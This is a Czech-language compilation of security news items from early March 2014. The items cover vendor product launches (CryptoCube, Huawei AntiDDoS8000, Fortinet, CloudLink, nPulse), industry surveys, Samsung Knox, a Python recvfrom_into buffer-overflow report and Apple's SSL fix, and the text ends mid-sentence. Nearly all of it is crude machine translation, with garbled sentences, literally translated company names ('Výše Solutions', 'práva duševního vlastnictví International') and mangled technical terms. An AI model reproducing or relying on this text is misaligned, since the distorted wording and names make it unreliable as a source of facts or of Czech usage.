Systém CryptoCube se skládá z přizpůsobené, vícefaktorové autentizace zabezpečená rack skříně obsahující kombinaci řešení Futurex Tvrzené Enterprise Security Platform na míru speciálně pro potřeby každé organizace používat. na technologii Futurex v Tvrzené Enterprise Security Platform základě CryptoCube domy FIPS 140-2 Level 3 ověřena Secure kryptografických prostředků v rámci jednoho prostoru. Přístup k systému je řízena dotykovým displejem na přední straně CryptoCube, s ověřování podařilo pomocí pověření na základě hesla, čipové karty, a biometrické údaje. bezpečnostní aplikace Enterprise CryptoCube:
Hardware Security Module služby
Enterprise Key a osvědčení o řízení
Šifrování dat, dešifrování, validace a ověřování
Bezpečné Attached Storage
SSL / TLS Link Encryption
Public Key Infrastructure
Elektronická faktura Podepisování a ověřování
Jádro kryptografických zálohování infrastruktury
CryptoCube nabízí širokou škálu funkcí pro snadné použití, bezpečnost, správu a monitoring:
Kompletní Přizpůsobení: CryptoCube může obsahovat zcela vlastní mix řešení Futurex Tvrzené Enterprise Security Platform a je k dispozici ve třech různých velikostech rackových (12U, 24U, a 44u). Před prováděním, Futurex je řešení Architekti pomáhat v rozvoji úplného plánu nasazení, s přihlédnutím k požadované funkce a budoucí požadavky na škálovatelnost.
Kontrola při vstupu: CryptoCube je vybaven duální, elektromagnetické blokovacího mechanismu, čtečky čipových karet, a biometrickou čtečkou pro robustní, Multifaktorová autentizace. Zápis Uživatel probíhá pomocí integrovaného LCD displeje, a veškerá citlivá data budou zpracována pomocí FIPS 140-2 Level 3-ověřené Secure kryptografického prostředku.
Integrovaný LCD displej: Všechna zařízení Futurex v rámci CryptoCube lze monitorovat a přistupovat k nim pomocí snadno použitelné dotykové obrazovky LCD. Od zápisu uživatelů k ověřování k monitorování výkonu, provoz CryptoCube je navržen tak, aby bylo co nejjednodušší a snadno-to-použití, jak je to možné.
Výkon a monitorování životního prostředí: senzory na ochranu životního prostředí aktivně sledovat, aby zajistila optimální funkčnost. Navíc, metriky výkonu, včetně využití CPU, využití paměti a zpracování transakcí propustnost pro všechna zařízení obsažených v CryptoCube jsou k dispozici přímo na ověřeným uživatelům prostřednictvím displeje na předním panelu.
Modulární, na klíč Architektura technologie Futurex využívá modulární architekturu v celé své platformy, umožňující nasazení na klíč a přizpůsobení pro každou část jádra kryptografické infrastruktury organizace. Tato platforma je lepší škálovatelnost umožňuje organizacím zvyšovat kapacitu s velmi malým úsilím. CryptoCube Kompaktní rozměry zajišťuje cenná data center využití prostoru je omezena na minimum.
"CryptoCube je jediným řešením svého druhu na trhu," řekl Brett Smith, prezident a generální ředitel společnosti Futurex. "Díky této technologii mohou podniky rychle vytvořit robustní základní kryptografické infrastruktury klíč způsobem s plnou redundancí, zcela odstraní typické překážky bránící realizaci."
Většina manažerů zabezpečení pod tlakem dodat aplikace rychleji
3.3.2014 Bezpečnost
Na konferenci RSA , Tufin oznámila výsledky průzkumu 169 odborníků na bezpečnost v současném stavu bezpečnostních operací. Vedená u Cisco Live! v Miláně, Itálie v lednu 2014 více než 90% respondentů uvedlo, že příroda na vyžádání virtualizace a cloudu se zvýšil tlak na ně poskytovat aplikace a služby rychleji.
S více než tři čtvrtiny respondentů si myslí virtualizace bude mít největší dopad na zabezpečení operací v průběhu následujících 12-18 měsících se tempo jen urychlí, což podtrhuje potřebu zvýšené automatizace. Tyto výsledky průzkumu doplňují zjištění většího října 2013 Tufin -pověřil průzkum, ve kterém 71% z více než 500 vedoucích IT profesionály ocitli museli přijmout nové postupy, učit se nové technologie a pracovat s novými lidmi, protože stejných trendů. Cisco technologií Live! Účastník odpovědi poukázal na další problémy jsou způsobené intenzivním tempem změn, zvýraznění několik příležitostí ke zlepšení bezpečnostní operace:
Téměř 90% se domnívá, že organizace se příliš spoléhají na bezpečnostní produkty a nástroje, sítě na úkor dobré síťové architektury a designu, aby bylo dosaženo optimální úrovně bezpečnosti sítě.
Téměř 40% respondentů uvedlo, že největší překážkou pro efektivní zabezpečení sítě je složitost sítě, zatímco 25% uvedlo nedostatek spolupráce a dalších 20% uvedlo neustálé změny vyskytující se v dnešních sítích jako jejich největší překážky.
S tímto je případ, to přijde jako žádné překvapení, že asi 89% respondentů uvedlo, že je třeba opravit po tom, mezi 20-60% změny bezpečnostní politiky v jejich organizaci.
Další jedna šestina oznámil, že je třeba je revidovat po tom, stejně jako až 60-80% z politických změn jejich organizací bezpečnosti.
"Stejně jako předchozí průzkumy potvrdily, role bezpečnosti v rámci operací se rozšiřuje s cílem vypořádat se s výzvami zabezpečení sítě, které přinesla cloud a virtualizaci," řekl Ruvi Kitov, Tufin CEO. "To vede k větší a hlubší spolupráci s dalšími skupinami v oblasti IT s cílem integrovat a automatizovat zabezpečení do oblastí, jako je návrh sítě, změny procesů a provozní výkonnost." Respondenti také to důrazně najevo, že hrozba krajina sama o sobě se mění stejně rychle jako firemní sítě. Když žádal, aby jmenovali tři vývoj, který bude s největší významně ovlivnit bezpečnost provozu v průběhu následujících 12-18 měsíců pokročilé hrozby jsou číslo jedna odpověď, hrany před virtualizace (číslo dvě) a přechodu Mission Critical podnikových aplikací do cloudu ( číslo tři). Průzkum však ukázal, že bezpečnostní operace týmy rostou na tuto výzvu. Více než tři čtvrtiny věřil jejich sítě byly jistější (55%), nebo jen jako bezpečný (22%), než tomu bylo před pěti lety. Když se zeptal, jaké jsou jejich největší automatizace problémy byly, jedna třetina citoval přesnost politických změn, jedna čtvrtina hlásil nedostatek konzistentních procesů napříč odděleními, a jedna pětina citoval nedostatek kontroly. To podtrhuje potřebu organizace realizovat řešení, která mohou modelují své sítě tak, aby pre-definované procesy a politiky mohou být uplatněna s cílem zajistit přesné automatizace změny a lepší kontrolu nad změnami zabezpečení sítě.
Samsung a Microsoft společně zabezpečí Android
3.3.2014 Mobil
Dohoda mezi oběma společnostmi se zaměří za spolupráci mezi bezpečnostní platformou Knox 2 a serverem Windows Server 2012 R2 ve snaze usnadnit vstup vlastních zařízení zaměstnanců do korporací.
Společnost Samsung minulý týden ohlásila, že její bezpečnostní aplikační kontejner Knox bude první implementaci na systému Android, která bude plně podporovat „Workplace Join“ (připojení na pracovišti) do Active Directory – ověřovací metodu pro zařízení BOYD v nové verzi serveru Windows Server 2012 R2, který společnost Microsoft uvolnila v minulém roce spolu s novou službou registrující zařízení do služby Active Directory Federation Service.
S funkcí „Workplace Join“ získali správci sítí možnost zpřístupnit Active Directory zařízením s OS Android, která nemají plná práva pro připojení do domény. Dosavadní verze serveru ovšem umožňuje řídit přístupová práva pouze pro zařízení s operačními systémy Windows 8.1 a iOS. Překvapivě se tak k i intranetovým umístěním a aplikacím nedostanou zařízení se systémem Windows Phone (což je z produktů Samsung například Ativ S).
Podle prohlášení Samsungu bude funkce „Workplace Join“ podporovat nejnovější modely mobilů a tabletů a postupně bude podpora rozšířena na všechna zařízení kompatibilní s technologií Knox. V tomto okamžiku bude tím prvním pravděpodobně právě uvedený Galaxy S5. Knox bude také podporovat Windows Intune, systém pro správu mobilních zařízeních firmy Microsoft zaměřený především na segment SME, k tomu je ale potřeba, aby byla do platformy Knox implementována potřebná rozhraní.
Firmy Samsung a Microsoft budou také spolupracovat na vývoji cloudového tisku, který by umožnil zařízením Samsung tisknout dokumenty prostřednictvím služeb cloudu Azure a serverů SharePoint.
Samsung od října 2013 prodal přes 25 milionů aplikací zavádějících ochranu Knox, kterou aktivně využívá přes milionů uživatelů. Jeho nová verze 2.0 bude s novými zařízeními distribuována od druhého čtvrtletí tohoto roku, současní uživatelé verze 1.0 ovšem budou muset nejdříve svá zařízení upgradovat na Android verze 4.4 (KitKat).
Buffer overflow v "Typ bezpečí" jazyk?
3.3.2014 Počítačový útok
Zadejte Bezpečné jazyky a přetečení zásobníku
Tam jsou ty z nás, které si většina z vývoje našeho softwaru do "Typ bezpečných" jazyků jako je Python, Ruby a. NET. Někdy jsme smuggly dívat se dolů na jazyky, jako je C, C + + a shromáždění, které nejsou typově bezpečné a neposkytují ochranu paměti. Víte, typ bezpečné programovací jazyky jsou "imunní" na otravné problémy, jako např. nárazníkové-offerflows.
Umožňuje porovnat zdrojový kód jednoduchého C a Python program, který přiřadí a vytisknout řetězec. Za prvé je zde Python zdrojový kód. >>> mystring = "Toto je můj řetězec" >>> print MyString Toto je můj řetězec můžete vidět, že v Pythonu nemusíte deklarovat typ proměnné. Nemusíte se určit, jak velká je vaše řetězec bude. Vše, co udělat, je přiřadit řetězec do proměnné a jazyk Python se postará o zbytek za vás. Nyní se podívejme na C verze tohoto kódu. char MyString [20]; mystring = "Toto je můj řetězec"; printf ("% s", mystring), S C první řádek říká kompilátoru, že "MyString" proměnná bude mít 20 znaků. Další řádek přiřadí proměnné MyString hodnotu "Toto je můj řetězec". Programátor je zodpovědný za definování jak co proměnnou bude ukládat a co velikost proměnné v paměti bude. Pokud programátor udělá chybu a pouze přidělí 20 bajtů paměti se pak pokusí uložit 30 bajtů stav vyrovnávací paměti přetečení. Od základní jazyk Python se postará o všechny správy paměti a variabilní psaní pro vás, to je "imunní" na tyto typy problémů. Tak typu použití typově bezpečné jazyky a všechno bude v pořádku. Je to tak?
Minulý týden zneužít byl vyslán, aby pastebin.com, že zneužil podmínku přetečení vyrovnávací paměti ve funkci Pythons socket.recvfrom_into (). Tato funkce byla zavedena v Pythonu 2.5 a je stále zranitelná v Pythonu 3. Každý program Python tam, že používá tuto funkci je totiž potenciálně zranitelný vůči vzdálenému vykořisťování. A využívat je pro tento vulnerabilty ditributed ve volné přírodě. Ale jak je to možné? Je to typ bezpečné jazyk! Všechny typ bezpečné jazyky se nabídnout nějakou ochranu proti paměťových manipluation útoky, ale nakonec se všechny tyto jazyky volat na nativních knihovnách. Takže zatímco vývojáři softwaru v typově bezpečné jazyky jsou obvykle méně pravděpodobné, že k rozvoji kód náchylnější k přetečení vyrovnávací paměti to využít slouží jako silný připomínka, než všechny jazyky jsou zneužíváni. Bezpečnostní pracovník se vždy spolehnout na obranu do hloubky. chyba byla oprava na nejnovější verzi 3.3.4 Python interpret. Aktualizujte svůj tlumočníka brzy. Verions 2.7 tlumočníci jsou trochu složitější. Lastest interpret je 2.7.6 a neobsahuje patch pro vydání # 20246. Oprava je k dispozici na webových stránkách, ale není kompilován do k nejnovější verzi ještě. V tomto případě prevence není možné, takže detekce a sledování je nezbytné. Dávejte pozor na webových stránkách Pythonu a dívat se na nejnovější aktualizace. Existuje několik šancí zaregistrujte se SANS Python programovacím kurzu. Připojte se mi Python pro penetraci testerů v Reston VA březnu 17-21 nebo SANSFire v Baltimore června 23-27.
Python chyba report: http://bugs.python.org/issue20246
http://www.sans.org/event/northern-virginia-2014/course/python-for-pen-testers
http://www.sans.org/event/sansfire-2014/course/python-for-pen-testers
Ochrana API, mobilních aplikací a cloudových služeb
2.3.2014 Mobil
CA Technologies oznámila nové a aktualizované řešení založené na identitě, aby pomohly zabezpečit rostoucí počet cloud, webových a mobilních aplikací provozovaných v dnešním otevřeném podniku. Oni také oznámila nové řešení mobility a API zaměřené na urychlení vývoje mobilní aplikace, zlepšení výkonu aplikací a poskytování bezpečnosti a uživatelský komfort z klienta na backend.
Správa identit a přístupu CA řešení (IAM) pomáhají zajistit správné uživatelé a zařízení mají právo přístupu k pravé údaje, zda je uživatel developer stavět nejnovější cloud mashup nebo mobilní aplikace, je zákazník, který přistupuje jeho nebo její mobilní bankovní aplikace nebo zaměstnanec přístup k firemní cloud služby. Chcete-li pomoci organizacím při plnění potřeb zabezpečení pro širokou škálu mobilních aplikací, ať už na zakázku, dodavatelem poskytnuta nebo přístupné přes webový prohlížeč-CA Technologies nabízí jednotný Web a API zabezpečení a správy řešení . To pomáhá urychlit proces vývoje pro softwarové inženýry a optimalizovat app výkon při maximálním zatížení. Další bezpečnostní nové aplikace a pokročilé autentizační řešení pomáhají zabezpečit aplikaci jednou nasazen. CA Vrstva 7 API portál umožňuje jednoduché vytvořit značkový on-line rozhraní pro vývojáře, takže mohou přistupovat ke všem konstrukce časové zdroje potřebné k rychle objevit a pochopit API, a pak vytvořit aplikaci a sledovat jeho použití. Navrženo pro podporu partnera, třetí-party a vnitřní vývojáři napříč různými skupinami současně, toto řešení poskytuje každá jednotka vlastní sadu přístupu a publikování API výsad - to vše z jediného portálu. Nejnovější verze portálu API poskytuje důležité funkce pro urychlení aplikace vývoj s bezpečností očekávané podnikání a zákazníků, včetně:
Objev API, interaktivní dokumentace a průzkum.
Zlepšení a zjednodušení seskupení API a moderní obal, který umožňuje vývojářům přidat nové funkce do aplikace jedním kliknutím.
Integrace s CA vrstvy 7 Mobile Access GatewayTM snadno přidat zabezpečení aplikace.
CA Vrstva 7 Mobile Access Gateway zjednodušuje proces přizpůsobení interních dat, aplikací a zabezpečení infrastruktury pro mobilní použití. Poskytuje centralizovaný způsob, jak udržet a kontrolovat zabezpečení a řízení politiky informačních aktiv vystavených přes API, ale zároveň přináší konzistentní úroveň výkonu pro aplikace koncového uživatele. To byl první API brána poskytovat out-of-the development kit bezpečnostní schránka software (SDK) pro urychlení začlenění tokenu manipulaci a jednotné přihlášení do mobilních aplikací pro bezpečnou autorizaci uživatelů, aplikací a zařízení. Nová funkce pro Mobil Access Gateway zahrnuje:
Integrace CA SiteMinder session cookies a Mobile SDK rozšířit pověření SiteMinder SSO s rodilými mobilních aplikací.
Sociální přihlášení do podnikových mobilních aplikací, které poskytují pohodlí pro uživatele při zachování bezpečnosti a správy věcí veřejných.
Podpora pro cross-platformní rámci mobilní rozvoje Adobe PhoneGap.
Jakmile mobilní aplikace je nasazen a provoz, je zapotřebí další úroveň zabezpečení, aby pomohla zajistit správné uživatelsky zaměstnávat správné zařízení ve správný čas od správné místo, má přístup k schválených žádostí.
CA Mobile Application Management (CA MAM) je nový, organicky vyvinula řešení pro podnik BYOD. CA MAM využívá inovativní technologie CA Smart Kontejnerizační dynamicky ovládat mobilní přístupové politiky aplikace v granulované úrovni při zachování nativní app zkušenosti specifické pro zařízení nebo platformu. Funkce, jako je geo-oplocení, časové oplocení, sítě-oplocení a zvýšenou autentizaci definovat a prosazovat podrobné přístupové politiky týkající se geografických, denní doby a sítí, dále zvýšení bezpečnosti podnikových mobilních aplikací. Aktuální verze CA Advanced ověřování doplňuje řešení, dnes oznámila, tím, že poskytuje řadu silných pověření ověřování a nástrojů pro hodnocení rizik založených na mobilním prostředí. Funkce v CA Advanced ověřování, které tvoří bezpečnostní pohodlné a bezproblémové pro uživatele patří:
SDK, který vloží silnou autentizaci do mobilní aplikace. S možností využití PKI nebo jednoho časového hesla (OTP) software pověření, bezpečnost a uživatelský komfort je výrazně jednodušší a lepší.
PKI pověření k zajištění bezproblémové uživatelské zkušenosti. Uživatel jednoduše přihlásí se svým obvyklým heslem a zákulisí silné ověřování probíhá.
OTP, které mohou být generovány CA Technologies zdarma mobilní aplikace, nebo to může být dodán ve formě textové zprávy, hlasové zprávy nebo e-mailu.
Kromě identit a řízení přístupu řešení CA Technologies také oznámila, že CA cloud pro mobilitu. Několik ohlášených IAM řešení jsou zahrnuty v této nabídky, což umožňuje end-to-end mobilní bezpečnost a správu od vývoje přes běhu a ze zařízení až po datová centra.
Další generace anti-DDoS spotřebiče od Huawei
2.3.2014 Bezpečnost
Huawei oznámila spuštění své nové generace anti-DDoS řešení na konferenci RSA 2014 . Huawei AntiDDoS8000 Series nabízí špičkové bezpečnostní funkce, včetně výkonu a ochrany z aplikační vrstvy, mobilní zařízení a odchozí 1Tbps Distributed Denial of Service (DDoS) útoky .
To může bránit z několika stovek gigabitů za sekundu DDoS hrozeb tím, že zaměstná funkcí, jako je učení podpisu, analýzy chování, reputace mechanismus a velké datové analýzy. Huawei AntiDDoS8000 zařízení může podporovat nové servisní kartu s výkonem ochranného 160Gbps a vysokou hustotou linky Karta s deseti 10GE portů. V důsledku toho může největší model zařízení podporují více než výkon 960Gbps. Určeno pro dopravce, datových center, velkých podniků a velkých poskytovatelů internetových obchodu, AntiDDoS8000 zařízení zvyšuje ochranu proti aplikační vrstvě útoky a útoky na protokol IPv6 IPv4 kompozit . sítí Vybrané funkce patří:
Detekce a zmírňování 100 + DDoS útoky včetně DDoS aplikační vrstvě (HTTP / HTTPS / DNS / SIP, atd.)
Přesné mobilní DDoS útoku mechanismus detekce a nulová falešná pozitivita na mobilní provoz při ochraně mobilního internetu služby
Prevence odchozích DDoS od datového centra s denní aktualizací botnety knihovny 5 milionů aktivních botnet IP adres.
"DDoS útoky se staly mnohem pestřejší. Dnes jsme svědky nárůstu útoků aplikace založené stejně jako útoky zahájené přímo z mobilních zařízení," řekl Liu Shaowei, Huawei Networking Business Unit generální ředitel. "Tyto nové plemena pokročilých útoků je těžké odhalit s tradičními průtoku na bázi anti-DDOS řešení, ale je možné zjistit pomocí Huawei nové AntiDDoS8000 zařízení." Nový AntiDDoS8000 je nyní k dispozici. Servisní karty 160Gbps bude k dispozici ve 4. čtvrtletí roku 2014.
Finanční instituce se musí podívat se za hranice svých vlastních obranných obvodů
2.3.2014 Bezpečnost
Lookingglass Cyber Solutions dnes zveřejnila výsledky nedávné studie provedené na globálních finančních institucí a rizik zavedené svými důvěryhodnými partnery a poskytovateli, a bylo zjištěno, že 100% z třetích stran sítích vzorku prokázalo, že buď známky kompromisu nebo zvýšené riziko.
Tato studie ukazuje, že třetí strany sítě rozšířit útoku a zavést rizika, která jdou často přehlíženy. Je to poučení, že společnosti jako cíl se učí tvrdě: Původně věřil být zasvěcených, poslední Target porušení bylo ve skutečnosti výsledkem třetí strany kompromisu. Bez správné nástroje na místě, organizace, prostě nemůže sledovat nebo ověřit tyto události včas. Analýza ilustruje nebezpečí ignorovat riziko třetích stran:
Odchozí botnet provoz a škodlivého chování byly nejčastější ukazatele, což představuje 75% z hodnoceného vzorku třetí-party sady.
25% z hodnoceného vzorku sady třetích stran odhalily specifické ukazatele týkající se Zeus bankovnictví Trojan.
Cílený přístup a obecnější malware byl také převládající v rámci těchto sítí.
Přítomnost počítačů přes 25% třetích stran se snaží komunikovat s několika Conficker závrtů.
Lookingglass také našli souvislost mezi sníženým výkonem a skutečnost, že 15% ze všech třetích stran, spoléhal na jeden upstream poskytovatele připojení k Internetu, protože 25% z těchto společností byly oběti DNS nájezdy. Dále, analýzy navrhl, že třetí strany zkoumané spolehnout na dalších třetích stran, poskytovat hosting a další služby, zvýšení celkové riziko v rámci dodavatelského řetězce primárního souboru zákazníka. Provedení zběžný 6. posouzení stupně inteligence některých z těchto poskytovatelů odhalila několik sítě sousedních hostitelů s vysokou týkají ukazatelů kompromisu, který by mohl potenciálně zvýšit objem prostředek třetí strany jako útok vektoru do primární sadě zákazníka. Například, pokud je populární webhostingu používá podnikání je ohrožena, to by zase umožní útočníkům injekci škodlivé reklamy nic netušícím zákazníkům. "Tato studie poukazuje na slabost, že průmysl byl velmi váhají mluvit na veřejnosti - skutečnost že důvěryhodné třetí strany by neměly a nemohou být skutečně věřit, "řekl Chris Coleman, generální ředitel společnosti LookingGlass." Globální organizace, jako jsou finanční instituce, jakož i maloobchodníky a organizace kritické infrastruktury, je třeba podívat se za hranice svých vlastních obranných obvodů a zvážit monitorování jejich veřejné .. Internet přítomnost lépe pochopit jejich útoku získává vhled do třetími stranami je zásadní pro snižování rizika v rámci dodavatelského řetězce " Provést analýzu, Lookingglass evaluated platebních procesorů, auditory a dalších finančních služeb v rámci finančního sektoru dodavatelského řetězce přes 35 - den rozpětí ve 4. čtvrtletí roku 2013. Lookingglass analyzovat veřejný prostor adres subjektů a sledovány pro veškeré ukazatele kompromisu a rizika vyplývající z jejich veřejně mapované IP a domény prostoru. Indikátory kompromisu a rizika byly shromážděny z mnoha globálních senzorů pro sběr a zpravodajských zdrojů.
Správa šifrování platformu pro ochranu v hybridních mraky
2.3.2014 Šifrování
Výše Solutions oznámila přidání CloudLink SecureVM a CloudLink SecureFile moduly na šifrování platformě CloudLink. Sčítání navazovat na stávající CloudLink SecureVSA a poskytnout výše zákazníkům flexibilitu k šifrování vrstvy na více místech v cloud computingu zásobníku s úložným prostorem, virtuální stroj soubor a řešení na úrovni aplikace nasazena a řízena ze společného rámce.
CloudLink poskytuje šifrování nadaci, která chrání důležitá data v celé řadě případů užití z jedné integrované platformy. CloudLink integrace s předními průmyslovými hypervisor a cloudových platforem umožňuje IT osobní efektivně nasadit bezpečnostní kontroly na všech úrovních infrastruktury. Čistý dopad je lepší regulace, nižší celkové náklady na vlastnictví a zlepšit obchodní agility zabezpečit citlivá data a objetí oblak s důvěrou. přidání dvou nových šifrovacích CloudLink modulů poskytuje zákazníkům větší flexibilitu nasazení tím, že nabízí více granulární bezpečnostní kontroly pro širší rozsah použití pouzdra na zajištění hostované pracovní plochy / DAAS a podnikových aplikací. CloudLink SecureVM řeší kritickou potřebu chránit integritu objem zavazadlového prostoru jak pro aplikační server a VDI obrázků strojů ve virtualizovaných a cloudových prostředích veřejných tím, že poskytuje bezpečnou autentizaci pre-boot a šifrování svazků. CloudLink SecureFile umožňuje jemnozrnné politiku zaměřit šifrování citlivých aplikací, jako jsou Microsoft SQL Server, SharePoint, Exchange a aplikací sady Office s unikátními šablon aplikací, které zjednodušují nasazení zabezpečení. Úroveň šifrování SecureFile soubor je také speciálně navrženy tak, aby podporovaly vysoce škálovatelné souborové servery poskytující rozlišovací potřebné k zachování své pokročilé možnosti správy souborů. Jako citlivější pracovní zátěž přesunout do cloudu, poskytovatelé služeb, jako například práva duševního vlastnictví International, která je předním poskytovatelem IaaS, zotavení po havárii a ochrany dat, je využití CloudLink nabízet šifrování jako služba (EaaS) jako služby s přidanou hodnotou na vrcholu svých výpočetních a úložných nabídky. "nám CloudLink poskytuje na správu šifrování platformu, která nám umožňuje poskytovat EaaS zajistit široký Řada iniciativ zákazníka, včetně hostovaných virtuálních desktopů, aplikací a databázových serverů a virtualizované úložiště, "řekl Bryan Dürr, ředitel práv duševního vlastnictví v architektury produktu. "Snadné zákazník provisioning a pokročilé možnosti zabezpečení, které kladou klíčové kontroly v rukou našich zákazníků nám umožňují nabízet prvotřídní bezpečnostní službu, která napomůže důvěru zákazníků a přijetí cloudu."
Síťové forenzní platforma pro 10 Gig světě
2.3.2014 Bezpečnost
nPulse Technologies oznámila spuštění svého Cyclone sítě Forenzní platformy, která navazuje na plnou zachycování paketů přidáním pokročilé, těžba line-míra zásadní bezpečnostní aplikační vrstva metadat a flexibilní velký analytický rámec zabezpečení dat na indexu, hledání, analyzovat a vizualizovat síť dopravy a urychleně rekonstruovat kybernetický útok kill řetězy.
Díky automatizaci ucelený cyklus kroků, které zajistí, že veškerý síťový provoz je zachycen a kontrolovány pro forenzní a zásahů incidentu, Cyclone poskytuje viditelnost nutnou dopravní porazit útoky a snížit průměrný čas na řešení pro pokročilé síťové hrozby. Klíčovými součástmi Cyclone sítě nPulse je Forenzní Platforma zahrnuje:
Zachycení: Cyclone využívá nPulse zachycení sondy eXtreme (CPX) spotřebiče, aby vykonával trvalé, bezztrátovou plné zachycení paketů na páteřní síti rychlostí až 20 Gbps. Prostřednictvím své indexu multi-level, CPX lze hledání zaznamenán provoz na 160 násobek své rychlosti snímání - to znamená, že v době kratší než jedna minuta CPX lze vyhledávat a zobrazovat provozní údaje, které konkurenční produkty může trvat až jeden den získat. CPX zároveň exportuje standardní záznamy toků ve formátu IPFIX na nSpector, nPulse v konzole pro správu.
Metadata Extraction: nová bezpečnostní Probe eXtreme (SPX) zařízení nPulse je kontroluje síťový provoz na rychlosti linky a výtažky vrstvě OSI 7 metadata o provozu, jako jsou použité aplikace, e-mailové adresy, typy souborů a záznamů DNS. SPX bez problémů vyváží tato data ve standardním formátu IPFIX na nSpector.
Big Data Security Analytics: Na konzole indexy řízení nSpector metadat z SPX a CPX, umožňující centralizované vyhledávání v rámci celého podniku pro provoz zájmu, analýzy provozu, a vlastní řídicí panely. Postavený využívat Otevřít zásobníku soukromý cloud platformy, ale také podporuje hrozba zpravodajských kanálů třetích stran, což správcům schopnost analyzovat historické přenosy pomocí konkrétních ukazatelů kompromisu, který může pomoci odhalit kyber útok v pokroku a odvrácení budoucích útoků.
"Boj proti kybernetickým hrozbám moderní skryté rychlejší, rozmanitější síť dopravní nároky téměř v reálném čase forenzní viditelnosti a analýzy na základní rychlosti sítě - možnosti, které úřadující technologie datovat se od '1 koncert světě" prostě nenabízejí, "řekl nPulse CEO Tim Sullivan . "S uvedením nPulse v cyklonu Network Forenzní platformy, zákazníci bránící dnešní nejrychlejší sítě může získat téměř v reálném čase nahlédnout do oblastí, kde se počítají sekund - včetně, která útoku, jsou nejčastěji využívány proti jejich organizaci, nebo které z jejich sítě obrany jsou vynechány malware navigaci "kill řetěz" mezi zaútočit a úspěšného kompromisu. " "Během posledních deseti let, útočníci se přesunuli hlouběji do paketu," dodal Sullivan. "Jako síť obrana, kontroly a detekční techniky se zlepšily, útočníci museli" pohybovat nahoru OSI zásobník ", aby se zabránilo odhalení a udržovat vytrvalost. Přesun do zásobníku umožňuje útočníkům ke změně, kdy jejich škodlivý kód komunikuje jednoduše a v co nejkratší době. Toto nové paradigma vyžaduje Vrstva 7 údaje pro detekci vniknutí a urychleně rekonstruovat zabití řetězy. Jak útočníci pohybovat nahoru zásobník, jdeme s nimi. Vrstva 7 obohacené meta-dat ve spojení s naší schopnosti poskytovat plné zachycení paketů umožňuje uživatelům Cyclone solidní základ, na kterém provádět síťové forenzní nezbytné pro detekci a reakci na zásahy ve včas, při řízení celkové riziko a odvrácení budoucích incidentů. "
Apple opravuje kritickou šifrovací chybu v iOS, OS X fix být propuštěn "brzy"
2.3.2014 Zranitelnosti
V pátek Apple oznámil propuštění aktualizaci softwaru pro svůj mobilní operační systém iOS, který řeší kritické šifrování chybu. Podobný aktualizace také byl propuštěn pro Apple TV.
Zdá se, že tam bylo pár chybějící validace kroků, které z implementace SSL zranitelné a umožní útočníkovi s výsadní postavení sítě, zachytit a / nebo modifikovat data v relacích chráněných SSL / TLS - ve skutečnosti, se připojit man-in- -Middle útok. iPhone a iPad uživatelům se doporučuje provést aktualizaci na verzi 7.0.6 nebo 6.16 z OS co nejdříve, a uživatelé OS X jsou vyzýváni, aby se zabránilo používání veřejné sítě, dokud stejná oprava je propuštěn pro OS. Podle různých zdrojů, prohlížeč Apple Safari a výchozí Mail.app jsou jak zranitelné, ale Firefox a Chrome nejsou ovlivněny, takže uživatelé systému Mac může dočasně přepínat s pomocí těch. Apple slíbil uvolnit OS X opravu "brzy". Vědci, kteří mají Testované starší verze obou iOS a OS X k závěru, že chyba byla přítomna měsíců. bezpečnostní výzkumník Google Adam Langley je vysvětleno , jak se vada funguje a kde chyba se stalo ve zdrojovém kódu. jednoduchosti chyby a skutečnost, že by mohla umožnit někdo - a zejména zpravodajské agentury - to využít pro špehování uživatelů vedla ke spekulaci, že je to existence mohla být úmyslné. Druhou možností je, že Apple má špatnou proces kód recenze na svém místě. Problém také lidé kritizují Apple preference pro proprietární uzavřený zdroj. Tvrdili, že takový do očí bijící chyba by mohla být spatřen před věky, pokud více výzkumníků bezpečnosti měl možnost přezkoumat kód.
Fortinet upgrady a rozšiřuje své Next-Generation Firewall
2.3.2014 Bezpečnost
Na konferenci RSA v San Franciscu, Fortinet oznámila aktualizaci operačního systému zabezpečení sítě FortiOS společnosti, spolu s novými verzemi pro integrované podávání zpráv, APT a silnou autentizaci. FortiOS 5 je operační systém základem pro FortiGate platformu a nabízí širokou škálu schopností světové úrovně bezpečnosti a možnosti konfigurace. FortiOS 5 se dodává:
Výrazně rychlejší SSL kontrola
Bohatší zpráv s ještě větší out-of-the-box zpráv a vrtat se schopností z FortiAnalyzer
Těsnější integrace s FortiAuthenticator a FortiSandbox pro bezproblémovou silné autentizace a pokročilé ochrany před hrozbami.
"Vůdci Bezpečnostní musí řešit hrozby z rostoucího provozu SSL," napsal Jeremy D'hoinne a Adam hils, výzkum ředitele společnosti Gartner. Jdou psát, "méně než 20% organizací s bránou firewall, je systém prevence narušení (IPS) nebo jednotné správy hrozeb (UTM) zařízení dešifrovat příchozí nebo odchozí datový tok protokolu SSL. Gartner se domnívá, že v roce 2017, více než polovina síťových útoků zaměřených na podniky budou používat šifrovaný provoz na kontroly bypass, se od méně než 5% dnes. " Společnost vydala FortiAnalyzer 5 aktualizaci a oznámila, že nadcházející FortiAnalyzer-3500E. Vylepšení softwaru zahrnují širší výběr předdefinovaných zpráv a větších schopností drilldown pro lepší viditelnost v chování sítě a těsnější integraci s FortiGate platformy společnosti. Kromě toho bude nový FortiAnalyzer-3500E nabízí 24 TB (rozšiřitelná až na 48 TB), skladování, aby byly splněny požadavky velkoobjemových podniků. Společnost také oznámila, že podnikové třídy FortiAuthenticator-1000D, která poskytuje několik metod ověřování, včetně hardwaru , software, e-mailu a SMS žetony, které pomáhají podnikům přejít na silnější, uživatelsky bázi modelu ověřování ve stále BYOD světě. Nový přístroj podporuje až 10.000 uživatelů a hladce integruje s FortiGate zařízení. Fortinet oznámil nový FortiSandbox-1000D. Jeho unikátní dual-level pískoviště spolu s aktivní pre-filtrace, dynamické hrozeb inteligence a bohaté vykazování jsou účinné při odhalování vysoce cílené útoky. A její konsolidovaný přístup zahrnující všechny protokoly a funkce v jednom přístroji spolu s jeho schopnost nasadit samostatně nebo jako integrovaný rozšíření FortiGate a FortiMail zařízení, snížit náklady a složitost. Konečně, nový FortiSandbox-1000D (a dříve vydané FortiSandbox -3000D) nyní spustit softwarovou verzi 1.2, který se vyznačuje lepší přístrojové vybavení, aby lépe vypořádat s rostoucím virtuálním stroji (VM) úniky techniky, aktualizovaný odhad motorů pro zvýšení sazeb detekce a novou detekci zpětného volání identifikovat odchozí komunikace a to jak na pískovišti a na drát. se FortiOS 5/FortiAnalyzer 5 aktualizace jsou nyní k dispozici. FortiAnalyzer-3500E se očekává, že ve druhém čtvrtletí tohoto roku. FortiAuthenticator-1000D je nyní k dispozici. FortiSandbox 